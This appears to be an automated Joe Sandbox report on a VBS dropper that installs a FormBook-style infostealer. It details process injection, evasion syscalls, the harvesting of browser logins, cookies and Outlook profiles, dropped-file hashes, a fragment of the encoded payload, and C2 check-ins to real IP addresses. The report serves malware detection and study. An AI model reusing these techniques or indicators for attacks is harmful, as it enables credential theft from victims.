        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345C81EE mov eax, dword ptr fs:[00000030h]3_2_345C81EE
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3452B1E0 mov eax, dword ptr fs:[00000030h]3_2_3452B1E0
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3452B1E0 mov eax, dword ptr fs:[00000030h]3_2_3452B1E0
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3452B1E0 mov eax, dword ptr fs:[00000030h]3_2_3452B1E0

        HIPS / PFW / Operating System Protection Evasion

        Source: C:\Windows\System32\wscript.exe, File created: x.exe.0.dr
        Source: C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe, NtAllocateVirtualMemory: Direct from: 0x77403BBC
        Source: C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe, NtQueryInformationToken: Direct from: 0x77402BCC
        Source: C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe, NtOpenFile: Direct from: 0x77402CEC
        Source: C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe, NtCreateFile: Direct from: 0x77402F0C
        Source: C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe, NtAllocateVirtualMemory: Direct from: 0x77402B1C
        Source: C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe, NtResumeThread: Direct from: 0x774035CC
        Source: C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe, NtMapViewOfSection: Direct from: 0x77402C3C
        Source: C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe, NtWriteVirtualMemory: Direct from: 0x77402D5C
        Source: C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe, NtNotifyChangeKey: Direct from: 0x77403B4C
        Source: C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe, NtSetInformationProcess: Direct from: 0x77402B7C
        Source: C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe, NtProtectVirtualMemory: Direct from: 0x773F7A4E
        Source: C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe, NtReadVirtualMemory: Direct from: 0x77402DAC
        Source: C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe, NtCreateUserProcess: Direct from: 0x7740363C
        Source: C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe, NtQueryInformationProcess: Direct from: 0x77402B46
        Source: C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe, NtResumeThread: Direct from: 0x77402EDC
        Source: C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe, NtWriteVirtualMemory: Direct from: 0x7740482C
        Source: C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe, NtAllocateVirtualMemory: Direct from: 0x7740480C
        Source: C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe, NtOpenKeyEx: Direct from: 0x77402ABC
        Source: C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe, NtDelayExecution: Direct from: 0x77402CFC
        Source: C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe, NtSetInformationThread: Direct from: 0x773F6319
        Source: C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe, NtQuerySystemInformation: Direct from: 0x774047EC
        Source: C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe, NtReadFile: Direct from: 0x774029FC
        Source: C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe, NtQuerySystemInformation: Direct from: 0x77402D1C
        Source: C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe, NtAllocateVirtualMemory: Direct from: 0x77402B0C
        Source: C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe, NtOpenSection: Direct from: 0x77402D2C
        Source: C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe, NtQueryVolumeInformationFile: Direct from: 0x77402E4C
        Source: C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe, NtDeviceIoControlFile: Direct from: 0x77402A0C
        Source: C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe, NtQueryAttributesFile: Direct from: 0x77402D8C
        Source: C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe, NtSetInformationThread: Direct from: 0x77402A6C
        Source: C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe, NtCreateKey: Direct from: 0x77402B8C
        Source: C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe, NtClose: Direct from: 0x77402A8C
        Source: C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe, NtProtectVirtualMemory: Direct from: 0x77402EBC
        Source: C:\Users\user\AppData\Local\Temp\x.exe, Section loaded: NULL target: C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe protection: execute and read and write
        Source: C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe, Section loaded: NULL target: C:\Users\user\AppData\Local\Temp\x.exe protection: execute and read and write
        Source: C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe, Section loaded: NULL target: C:\Windows\SysWOW64\cmdkey.exe protection: execute and read and write
        Source: C:\Windows\SysWOW64\cmdkey.exe, Section loaded: NULL target: C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe protection: read write
        Source: C:\Windows\SysWOW64\cmdkey.exe, Section loaded: NULL target: C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe protection: execute and read and write
        Source: C:\Windows\SysWOW64\cmdkey.exe, Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
        Source: C:\Windows\SysWOW64\cmdkey.exe, Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
        Source: C:\Windows\SysWOW64\cmdkey.exe, Thread register set: target process: 6656
        Source: C:\Windows\SysWOW64\cmdkey.exe, Thread APC queued: target process: C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe
        Source: C:\Windows\System32\wscript.exe, Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
        Source: C:\Users\user\AppData\Local\Temp\x.exe, Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
        Source: C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe, Process created: C:\Windows\SysWOW64\cmdkey.exe "C:\Windows\SysWOW64\cmdkey.exe"
        Source: C:\Windows\SysWOW64\cmdkey.exe, Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
        Source: C:\Users\user\AppData\Local\Temp\x.exe, Code function: 2_2_004034CE EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,lstrlenA,wsprintfA,GetFileAttributesA,DeleteFileA,SetCurrentDirectoryA,CopyFileA,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,2_2_004034CE
        Source: C:\Windows\System32\wscript.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

        Stealing of Sensitive Information

        Source: Yara match, File source: 00000005.00000002.140485141531.00000000031F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000003.00000002.136238638056.00000000341C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000006.00000002.140483811557.00000000014B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000003.00000002.136239540037.0000000035220000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000005.00000002.140482656730.0000000000A30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000004.00000002.140484881545.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000005.00000002.140485253633.0000000003240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: C:\Windows\SysWOW64\cmdkey.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
        Source: C:\Windows\SysWOW64\cmdkey.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
        Source: C:\Windows\SysWOW64\cmdkey.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
        Source: C:\Windows\SysWOW64\cmdkey.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
        Source: C:\Windows\SysWOW64\cmdkey.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
        Source: C:\Windows\SysWOW64\cmdkey.exe, Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
        Source: C:\Users\user\AppData\Local\Temp\x.exe, Directory queried: number of queries: 1001

        Remote Access Functionality

        Source: Yara match, File source: 00000005.00000002.140485141531.00000000031F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000003.00000002.136238638056.00000000341C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000006.00000002.140483811557.00000000014B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000003.00000002.136239540037.0000000035220000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000005.00000002.140482656730.0000000000A30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000004.00000002.140484881545.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000005.00000002.140485253633.0000000003240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        [MITRE ATT&CK matrix. Columns: Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact]
        [Behavior graph. ID: 1499548; Sample: #U5831#U50f9#U8acb#U6c42 - ...; Startdate: 27/08/2024; Architecture: WINDOWS; Score: 100]

        Source | Detection | Scanner | Label
        #U5831#U50f9#U8acb#U6c42 - #U6a23#U672c#U76ee#U9304.vbs | 12% | Virustotal |
        #U5831#U50f9#U8acb#U6c42 - #U6a23#U672c#U76ee#U9304.vbs | 11% | ReversingLabs |

        Source | Detection | Scanner | Label
        C:\Users\user\AppData\Local\Temp\x.exe | 100% | Avira | HEUR/AGEN.1305039
        C:\Users\user\AppData\Local\Temp\nsb9D0E.tmp\System.dll | 0% | ReversingLabs |

        No Antivirus matches
        Name | IP | Active | Malicious | Antivirus Detection | Reputation
                          Name | Malicious | Antivirus Detection | Reputation
                          Name | Source | Malicious | Antivirus Detection | Reputation
                          http://nsis.sf.net/NSIS_Error | x.exe | false | 0% (Virustotal); Avira URL Cloud: safe | unknown
                          IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                          Joe Sandbox version:40.0.0 Tourmaline
                          Analysis ID:1499548
                          Start date and time:2024-08-27 07:54:15 +02:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 18m 45s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                          Run name:Suspected Instruction Hammering
                          Number of analysed new started processes analysed:6
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:2
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Sample name:#U5831#U50f9#U8acb#U6c42 - #U6a23#U672c#U76ee#U9304.vbs
                          Detection:MAL
                          Classification:mal100.troj.spyw.evad.winVBS@9/9@19/14
                          EGA Information:
                          • Successful, ratio: 75%
                          HCA Information:
                          • Successful, ratio: 87%
                          • Number of executed functions: 102
                          • Number of non-executed functions: 310
                          Cookbook Comments:
                          • Found application associated with file extension: .vbs
                          • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                          • Exclude process from analysis (whitelisted): dllhost.exe
                          • Execution Graph export aborted for target kCwueywDTS.exe, PID 7976 because it is empty
                          • Report creation exceeded maximum time and may have missing disassembly code information.
                          • Report size exceeded maximum capacity and may have missing behavior information.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                          • Report size getting too big, too many NtQueryDirectoryFile calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                          Time | Type | Description
                          01:58:24 | API Interceptor | 30690458x Sleep call for process: cmdkey.exe modified
                          Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                Process:C:\Windows\SysWOW64\cmdkey.exe
                                                File Type:SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 7, database pages 59, cookie 0x52, schema 4, UTF-8, version-valid-for 7
                                                Category:dropped
                                                Size (bytes):122880
                                                Entropy (8bit):1.1414673161713362
                                                Encrypted:false
                                                SSDEEP:192:8t4nKTjebGA7j9p/XH9eQ3KvphCNKRmquPWTPVusE6:8t4n/9p/39J6hwNKRmqu+7VusE
                                                MD5:24937DB267D854F3EF5453E2E54EA21B
                                                SHA1:F519A77A669D9F706D5D537A203B7245368D40CE
                                                SHA-256:369B8B4465FB5FD7F12258C7DEA941F9CCA9A90C78EE195DF5E02028686869ED
                                                SHA-512:AED398C6781300E732105E541A6FDD762F04E0EC5A5893762BFDCBDD442348FAF9CB2711EFDC4808D4675A8E48F77BEAB3A0D6BC635B778D47B2DADC9B6086A3
                                                Malicious:false
                                                Reputation:moderate, very likely benign file
                                                Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):11776
                                                Entropy (8bit):6.021689811183493
                                                Encrypted:false
                                                SSDEEP:192:S9rQDenC9VrcK7REgSWOprANupQYLRszDDH/d9CWlXo7U6Wxf:SJQEaVAK7R9SfpjpQYLRszfH/d9CWB1j
                                                MD5:8508FA0AB17E36E071687243283C2AEF
                                                SHA1:D45391D0454FBB9EB66FA72ECF0E2CADF0522BFE
                                                SHA-256:90F3CEBB5B3759EB1BD72CEE7CD8B694440EE398FE970B763DB7A7B67208E4C8
                                                SHA-512:241CF26E57006402897D8ADAFF37F3006C1BDBB09D6C5D10C32D556996DF5785DC81C35CCBBC74384F80853A3E4AEA7BE251A4FA2613BE42108E11A00692DF5A
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 0%
                                                Joe Sandbox View:
                                                • Filename: Anfrage f#U00fcr ein Angebot - Musterkatalog.vbs, Detection: malicious, Browse
                                                • Filename: Anfrage f#U00fcr ein Angebot - Musterkatalog.vbs, Detection: malicious, Browse
                                                • Filename: Quote - QUO0000_06272024.exe, Detection: malicious, Browse
                                                • Filename: Purchase Order06272024.exe, Detection: malicious, Browse
                                                • Filename: Purchase Order2883.exe, Detection: malicious, Browse
                                                • Filename: Quote - QUO0000_06272024.exe, Detection: malicious, Browse
                                                • Filename: Purchase Order2883.exe, Detection: malicious, Browse
                                                • Filename: Purchase Order06272024.exe, Detection: malicious, Browse
                                                • Filename: Sinchrones_000965_MEC_10.08.23pdf.exe, Detection: malicious, Browse
                                                Reputation:moderate, very likely benign file
                                                Process:C:\Windows\System32\wscript.exe
                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                Category:dropped
                                                Size (bytes):757008
                                                Entropy (8bit):7.643379129614274
                                                Encrypted:false
                                                SSDEEP:12288:5ZCgwRmWooxcQTjJ/xBnzIokc1G0mRRNqfivjcha2RDIkLsQVl:5LfhHAd/5bWRNqftLsWl
                                                MD5:36EFC401E52E98CD1C735D8A767A1E6D
                                                SHA1:3CF04490CAF786A71855B16F9D9C9DC07C64455D
                                                SHA-256:A4F48C60654A5880B88AFC9DC898B52EC61DDEB733207E410F3748287C892508
                                                SHA-512:35B83DC4F672BA7114BE63BDB097F56677579B647AA88BF121F910F633F395568E231079433E3C5010BB9F88567B30B15C70F2B36FF00F759866E5E69D83A9EB
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Avira, Detection: 100%
                                                Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                File Type:ASCII text, with very long lines (65536), with no line terminators
                                                Category:dropped
                                                Size (bytes):457666
                                                Entropy (8bit):2.6428606515524327
                                                Encrypted:false
                                                SSDEEP:1536:9qm6LBR/NUjWBj3RK1JRURUPkBjRIJTb1r1FE5vtXADKc2EfyjrSWPR4Gk5lcR8l:oFtw1I++5Ae02E2VYX7DkZdBS1DE2Z
                                                MD5:4A8B957C3A18FD46611553D2A04E0404
                                                SHA1:F12221D0392D65C8ED3BB8EDEFE3C8113FB1B125
                                                SHA-256:48C3C2AF70B880C6949EB6E2B00947922492D469D98BD71EFCAA24B516766CCA
                                                SHA-512:4F90312608E93CA18BB9E88EA887F8E2B2005EA0FE97FEF679D589543F9AD1C33EC2ACDB5843455B63B197CD96250DCF9CAA12DE09C2216D2D82924F92E5152B
                                                Malicious:false
                                                Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):335249
                                                Entropy (8bit):1.2457536185033387
                                                Encrypted:false
                                                SSDEEP:768:z7X3OpuJLln4NHehXm71SCUVbrqAIMv+2/b4V2P3u3WK7N8Bf3OK25EJVKkDhzCF:/KtvU3Q+WaYCvzP/T308dU9Jt
                                                MD5:301C0542B3A4F12751237E7D66AB87E7
                                                SHA1:22047C1DF9DBBCD9629B38893FA7294C0956914D
                                                SHA-256:A3564ECFD5EE16655709BA738EA111285494A4950A40B5E9DF6C3F7853EEDC7F
                                                SHA-512:BE76B52F6901BB470C3F562F33B72C5883AADE81ABD6658BDF6E569969617195CB736AF1842890058421BB273C51A72683F14E77D15D0EDBDFC119AC41EA39B9
                                                Malicious:false
                                                Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):314428
                                                Entropy (8bit):1.2438484306136453
                                                Encrypted:false
                                                SSDEEP:768:dCKtpgJr83BA79OLaRtFEA5cd2XMTPo2C1hNM5/Vvtdh4uwPYCP8LUS9tp9hd4aH:dZiSUi/ore/T4jSjjWacNg1llIx3f09
                                                MD5:E5E18855ACC6A11A45D0D13A2BC6CDB6
                                                SHA1:8B54E9570E511A1049704CCCAC783B5D75379CED
                                                SHA-256:FACDDD60C2D25AE9B18FB1FE559ECFB027F4F5D0779C1687ED7BD715E290A8D0
                                                SHA-512:9A4DE5B8654A0F1F1655341BC1B4206D04F5A8CC48A837020AE2B14414BD39D4D84E52DDD4E4554A4B51AE2ABCBAA3B74327DA25F15C5A1E87547209E5C2A223
                                                Malicious:false
                                                Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):498
                                                Entropy (8bit):4.220963799226289
                                                Encrypted:false
                                                SSDEEP:12:Wni6jtZtFxq8OAkFkyVMVPNft+HzA92oQTj0AmCAMYmgEr:WiErSHVM1NOTjyDMYmTr
                                                MD5:371A762DB20650DD795210D34000F4D2
                                                SHA1:CF39E990575AD68DCE8F74BA3EDFBA31468619D3
                                                SHA-256:A61AC9BC9DBDC35BEA83CFFEF578649FCF318F62A519A329B5A5540C582DE100
                                                SHA-512:A7588050A2DC1C43F59828769AEAA40CC8D9A10AE2773788E7D1A42759E4271339995BE521E1DDFEE3E1E780111D750E1EC1E6E9FE7D807A5C3CB9AFBDBAFEF1
                                                Malicious:false
                                                Preview:gwens exempted kimos telegraferingens omstdendes.gleets improficience samlebaandsarbejdernes trichloroethylene doupioni amatrfotografernes foelelsesladet..gaudier sttyskerne rvejagternes.meningitissens toptiens ripened cocillana tullibee histometabasis gamelike venstrepresser beskyttelser kendelsers..underkursernes emanuella inddm strafansvar skiftingen isflagen,macrodactylous lamslaaedes konditallene supertare alvorstalers heltidsbeskftigelses gospelise bihulerne cubalaya benzindksel fiffig..
                                                Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):212211
                                                Entropy (8bit):7.553469024606494
                                                Encrypted:false
                                                SSDEEP:3072:WvmeO3thVO+pJUkgwonLdgysRSywzWwFo51lmfHfh5Pc+j2cBE8J4XJE+:WvG3thk+/1ynORSZiwFwu//8e4X/
                                                MD5:DC1C7CBE79032AC12FE95D7D6CBCA90D
                                                SHA1:D2C1A0C2736ED0BBED70E8F55640AA3C630D7096
                                                SHA-256:5F759A3264AB74C9F959D7745F54DC39B2587D634A4DCB4245148C4536062E03
                                                SHA-512:FAB78218EC7BD8B05E1AEF0FD58CEDE95F20E4670074AC8F923A97F671AA9A7CEEEB834BD5A53F1BB75A678ED7406BF6296E445948536001CF60638F62526C2F
                                                Malicious:false
                                                Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):292960
                                                Entropy (8bit):1.2562120543510875
                                                Encrypted:false
                                                SSDEEP:768:Ata7tm7RWWlp29ZCMz+vsS/zMRb5xH5/z41RAKozj/hBzOsREA8mEs4p/QsO6mGE:iNMh2nK8E90bM+aad
                                                MD5:8B035F50B7D03E8E3C12C4A7E9EF0416
                                                SHA1:C40DDFD166A8A2A57DE34C6E6F0EAA737F562523
                                                SHA-256:0370251F5DD197ECE0EA8A41F159FDDC42D7A1CD91608156DDF57BF7FF6340C1
                                                SHA-512:51F7301F04A81B9F7341273C6D9AFC942AC1318A63B9C9BEB60389E3C22DC1741DF62AFF2C9986FCA787370CEF6DA2EE4DD062DA8F6436B0095C1872B065D9C3
                                                Malicious:false
                                                File type:ASCII text, with very long lines (65489), with CRLF line terminators
                                                Entropy (8bit):5.57972950050386
                                                TrID:
                                                • Visual Basic Script (13500/0) 100.00%
                                                File name:#U5831#U50f9#U8acb#U6c42 - #U6a23#U672c#U76ee#U9304.vbs
                                                File size:1'168'335 bytes
                                                MD5:62f8514c35c5abc8a6138ff3029a9af7
                                                SHA1:9835d6cc79ed8cc63c13171cfd9d87efec7467a0
                                                SHA256:15c644bdde76746a5798daa41fc25ac5f2a999d1fe6e11b1e47f7b328e7a1722
                                                SHA512:69e668c8bbeb1a41fd13b43db162d5a8529cd0c01f2e169328577114ab9e87240967e0650cc485274a26e2ee9fb1065363432b26c0c041b9f89569b0e585acff
                                                SSDEEP:24576:UeSzCyPcxJchNyCz5TsdTMhfkTMZoFU/7UcsKyL5g5:yzE+8Cz5ir5cNya
                                                TLSH:F145E1A6FF337E86791C41C68E124BCABCA80CBD4451D6E6B49DF5A8304C4B3199EE1D
                                                File Content Preview:' Initialize the base64 string..Dim base64Str..base64Str = ");;qQ****M********E********//8****Lg******************Q**********************************************************************************************4**********4fug4**t**nNIbg..)M0h;;Ghpcy..wcm9n
                                                Icon Hash:68d69b8f86ab9a86
Timestamp | Protocol | SID | Signature | Severity | Source Port | Dest Port | Source IP | Dest IP
2024-08-27T08:05:03.914656+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49926 | 80 | 192.168.11.20 | 154.23.184.207
2024-08-27T08:01:05.754850+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49886 | 80 | 192.168.11.20 | 176.57.64.102
2024-08-27T08:03:52.347239+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49905 | 80 | 192.168.11.20 | 23.231.158.3
2024-08-27T08:00:29.943422+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49876 | 80 | 192.168.11.20 | 185.230.15.3
2024-08-27T07:59:06.794690+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49852 | 80 | 192.168.11.20 | 23.231.158.3
2024-08-27T08:00:13.071084+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49871 | 80 | 192.168.11.20 | 154.23.184.207
2024-08-27T08:00:43.272478+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49880 | 80 | 192.168.11.20 | 199.59.243.226
